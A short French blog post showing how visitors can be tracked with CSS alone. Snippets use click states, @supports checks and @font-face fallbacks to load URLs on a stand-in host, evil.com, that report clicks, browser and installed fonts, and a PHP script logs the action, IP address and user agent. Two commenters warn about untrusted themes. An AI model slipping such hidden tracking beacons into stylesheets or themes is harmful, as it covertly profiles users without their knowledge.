Tracking Users with CSS

Holy Fuck...
C'est pas con du tout: pister les clicks des visiteurs via css:




 #link:active::after {

    content: url("https://evil.com/track?action=link_clicked");

}

Et hop, côté serveur, tu récupères tout bien comme tu veux.






session_start();



// Prints the time that the script ran

print("Timestamp: " . time());



// Prints the action specified by the action parameter (in this case, "link_clicked")

print("Action: " . $_REQUEST['action']);



// Prints the user's IP address

print("IP Address: " . $_SERVER['REMOTE_ADDR']);



// Prints the user's browser agent

print("User Agent: " . $_SERVER['HTTP_USER_AGENT']);

?>



Et c'est pas tout !

On peut détecter le navigateur:




 @supports (-webkit-appearance:none) and (not (-ms-ime-align:auto)){

    #chrome_detect::after {

        content: url("https://evil.com/track?action=browser_chrome");

    }

}


ou même l'OS:




// stylesheet.css

@font-face {

    font-family: Font1;

    src: url("https://evil.com/track?action=font1");

}



#font_detection {

    font-family: Calibri, Font1;

}



<!-- page.html -->

<div id="font_detection">test</div>






Source image

❝ 2 commentaires ❞

1  Jerry Wham le

Oui. Il va falloir désactiver le css bientôt...
C'est aussi pour ça qu'il faut se méfier des thèmes à télécharger et des frameworks un peu chelou qu'on ne maîtrise pas.

 
2  Bronco le

C'est clair... il vaut mieux bien regarder le code avant de réutiliser un truc...

 

Fil RSS des commentaires de cet article

✍ Écrire un commentaire

les commentaires relevant du SPAM seront filtrés et dégagés direct...


spoiler
Quelle est le premier caractère du mot q2c9wu ?